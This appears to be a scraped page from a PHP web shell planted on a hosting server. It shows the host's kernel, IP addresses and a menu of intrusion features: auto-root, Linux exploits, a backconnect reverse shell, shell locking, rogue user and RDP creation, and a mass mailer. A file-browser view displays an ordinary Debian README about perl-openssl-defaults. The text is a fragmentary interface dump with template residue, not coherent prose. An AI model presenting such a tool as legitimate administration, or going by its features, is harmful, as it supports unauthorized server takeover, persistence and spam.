Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.130.123
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-openssl-defaults /
[ HOME SHELL ]
Name
Size
Permission
Action
README.Debian
1.5
KB
-rw-r--r--
changelog.gz
922
B
-rw-r--r--
copyright
1.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.Debian
Dependencies for packages exposing OpenSSL binary interface to Perl code ======================================================================== This information is only relevant for maintainers of Debian packages of Perl XS modules dealing with OpenSSL. Packages exposing libssl binary objects like SSL_CTX struct pointers to Perl code need to be compiled against the same version of OpenSSL to avoid binary incompatibility issues. See <https://bugs.debian.org/848113>. Compatibility can be ensured by depending on the "perl-openssl-abi-x" virtual package, where the name is dynamically generated from the SONAME of the libssl.so symlink included in the libssl-dev package. There can be only one such package on the system at a time, so this guarantees that all the installed packages share the same compatibility level. To generate this dependency, please build-depend on perl-openssl-defaults and do one of the following: debhelper using dh: Use the "perl_openssl" addon and ensure ${perl:Depends} is used in debian/control. The debian/rules file might look as follows: #!/usr/bin/make -f %: dh $@ --with perl_openssl Alternatively, since perl-openssl-defaults/4 you can just build depend on dh-sequence-perl-openssl and omit the "--with perl_openssl" part. old-style debhelper: Run dh_perl_openssl after dh_perl and ensure ${perl:Depends} is used in debian/control. packages not using debhelper: Include /usr/share/perl-openssl-defaults/perl-openssl.make in debian rules and use PERL_OPENSSL_ABI_VERSION.
Close